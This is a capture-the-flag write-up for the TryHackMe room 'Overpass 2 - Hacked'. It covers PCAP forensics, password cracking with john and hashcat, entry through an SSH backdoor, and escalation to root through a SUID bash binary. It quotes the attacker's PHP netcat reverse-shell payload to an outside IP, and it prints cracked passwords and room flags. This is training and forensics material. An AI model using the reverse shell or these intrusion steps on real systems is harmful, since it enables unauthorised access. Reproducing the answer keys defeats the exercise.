TryHackMe - Overpass 2 - Hacked - Writeup

Overpass has been hacked! Can you analyse the attacker’s actions and hack back in?

Forensics - Analyse the PCAP

Overpass has been hacked! The SOC team (Paradox, congratulations on the promotion) noticed suspicious activity on a late night shift while looking at shibes, and managed to capture packets as the attack happened.

Can you work out how the attacker got in, and hack your way back into Overpass’ production server?

Note: Although this room is a walkthrough, it expects familiarity with tools and Linux. I recommend learning basic Wireshark and completing CC: Pentesting and Learn Linux as a bare minimum.

md5sum of PCAP file: 11c3b2e9221865580295bc662c35c6dc


  • What was the URL of the page they used to upload a reverse shell?

    Check overpass2.pcapng line number 27.

    Answer: /development/

  • What payload did the attacker use to gain access?

    Check overpass2.pcapng line number 14 POST request.

    Answer: <?php exec(“rm /tmp/f;mkfifo /tmp/f;cat /tmp/f /bin/sh -i 2>&1 nc 192.168.170.145 4242 >/tmp/f”)?>
  • What password did the attacker use to privesc?

    Check overpass2.pcapng line number 76.

    Answer: whenevernoteartinstant

  • How did the attacker establish persistence?

    Check overpass2.pcapng line number 120.

    Answer: https://github.com/NinjaJc01/ssh-backdoor

  • Using the fasttrack wordlist, how many of the system passwords were crackable?

    Line number 114 in overpass2.pcapng the attacker dumped shadow file try to crack using john

    Answer: 4

root@ip-10-10-204-217:~# john --wordlist=/usr/share/wordlists/fasttrack.txt hash.txzt
Warning: detected hash type "sha512crypt", but the string is also recognized as "sha512crypt-opencl"
Use the "--format=sha512crypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 5 password hashes with 5 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
secret12         (bee)
abcd123          (szymex)
1qaz2wsx         (muirland)
secuirty3        (paradox)
4g 0:00:00:02 DONE (2021-05-23 18:14) 1.351g/s 75.00p/s 375.0c/s 375.0C/s Spring2017..starwars
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

Research - Analyse the code

Now that you’ve found the code for the backdoor, it’s time to analyse it.

  • What’s the default hash for the backdoor?

    Clone the SSH Backdoor in the main.go there is a hash variable

    Answer: bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e3

  • What’s the hardcoded salt for the backdoor?

    Last line in main.go have a hash which is the salt of the backdoor.

    Answer: 1c362db832f3f864c8c2fe05f2002a05

  • What was the hash that the attacker used? - go back to the PCAP for this!

    Line number 3479 the attacker used a hash.

    Answer: 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed

  • Crack the hash using rockyou and a cracking tool of your choice. What’s the password?

    Lets use hash to crack using hashcat and rockyou.txt wordlists. Remember to combine the hash like hash:salt

    hashcat --force -m 1710 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
    

    Answer: november16

Attack - Get back in!

  • The attacker defaced the website. What message did they leave as a heading?

    Visit to the MACHINE_IP

    Answer: H4ck3d by CooctusClan

  • Using the information you’ve found previously, hack your way back in!

    Answer: Not required

Nmap Scan

root@ip-10-10-50-126:~# nmap -sVC -A 10.10.53.38

Starting Nmap 7.60 ( https://nmap.org ) at 2021-05-24 08:02 BST
Nmap scan report for ip-10-10-53-38.eu-west-1.compute.internal (10.10.53.38)
Host is up (0.00047s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e4:3a:be:ed:ff:a7:02:d2:6a:d6:d0:bb:7f:38:5e:cb (RSA)
|   256 fc:6f:22:c2:13:4f:9c:62:4f:90:c9:3a:7e:77:d6:d4 (ECDSA)
|_  256 15:fd:40:0a:65:59:a9:b5:0e:57:1b:23:0a:96:63:05 (EdDSA)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: LOL Hacked
2222/tcp open  ssh     OpenSSH 8.2p1 Debian 4 (protocol 2.0)
| ssh-hostkey: 
|_  2048 a2:a6:d2:18:79:e3:b0:20:a2:4f:aa:b6:ac:2e:6b:f2 (RSA)
MAC Address: 02:3B:97:A6:85:71 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=5/24%OT=22%CT=1%CU=38047%PV=Y%DS=1%DC=D%G=Y%M=023B97%T
OS:M=60AB4FA8%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10D%TI=Z%CI=Z%TS=A
OS:)SEQ(SP=102%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M2301ST11NW7%O2=M23
OS:01ST11NW7%O3=M2301NNT11NW7%O4=M2301ST11NW7%O5=M2301ST11NW7%O6=M2301ST11)
OS:WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN(R=Y%DF=Y%T=40%W=
OS:F507%O=M2301NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N
OS:)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0
OS:%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7
OS:(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=
OS:0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.47 ms ip-10-10-53-38.eu-west-1.compute.internal (10.10.53.38)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.13 seconds

On line number 72 of overpass2.pcapng I found a username james. Lets try to login using ssh, I tried to login with previous cracked password but 22 port won’t let me in with the password november16 . Let’s try in 2222 port

root@ip-10-10-50-126:~# ssh james@10.10.53.38 -p 2222
The authenticity of host '[10.10.53.38]:2222 ([10.10.53.38]:2222)' can't be established.
RSA key fingerprint is SHA256:z0OyQNW5sa3rr6mR7yDMo1avzRRPcapaYwOxjttuZ58.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[10.10.53.38]:2222' (RSA) to the list of known hosts.
james@10.10.53.38's password: 
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

james@overpass-production:/home/james/ssh-backdoor$ id
uid=1000(james) gid=1000(james) groups=1000(james),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
james@overpass-production:/home/james/ssh-backdoor$ 

Login success via ssh got the user.txt

  • What’s the user flag?

    Answer: thm{d119b4fa8c497ddb0525f7ad200e6567}

In the direcotry of current logged user have .suid_bash

james@overpass-production:/home/james$ ls -la
total 1136
drwxr-xr-x 7 james james    4096 Jul 22  2020 .
drwxr-xr-x 7 root  root     4096 Jul 21  2020 ..
lrwxrwxrwx 1 james james       9 Jul 21  2020 .bash_history -> /dev/null
-rw-r--r-- 1 james james     220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 james james    3771 Apr  4  2018 .bashrc
drwx------ 2 james james    4096 Jul 21  2020 .cache
drwx------ 3 james james    4096 Jul 21  2020 .gnupg
drwxrwxr-x 3 james james    4096 Jul 22  2020 .local
-rw------- 1 james james      51 Jul 21  2020 .overpass
-rw-r--r-- 1 james james     807 Apr  4  2018 .profile
-rw-r--r-- 1 james james       0 Jul 21  2020 .sudo_as_admin_successful
-rwsr-sr-x 1 root  root  1113504 Jul 22  2020 .suid_bash
drwxrwxr-x 3 james james    4096 Jul 22  2020 ssh-backdoor
-rw-rw-r-- 1 james james      38 Jul 22  2020 user.txt
drwxrwxr-x 7 james james    4096 Jul 21  2020 www

We got root and readed the txt file

james@overpass-production:/home/james$ ./.suid_bash -p
.suid_bash-4.4# whoami
root
.suid_bash-4.4# cat /root/root.txt
thm{d53b2684f169360bb9606c333873144d}
  • What’s the root flag?

    Answer: thm{d53b2684f169360bb9606c333873144d}

TryHackMe room link: Overpass 2 - Hacked

Thanks for reading.

Written on May 23, 2021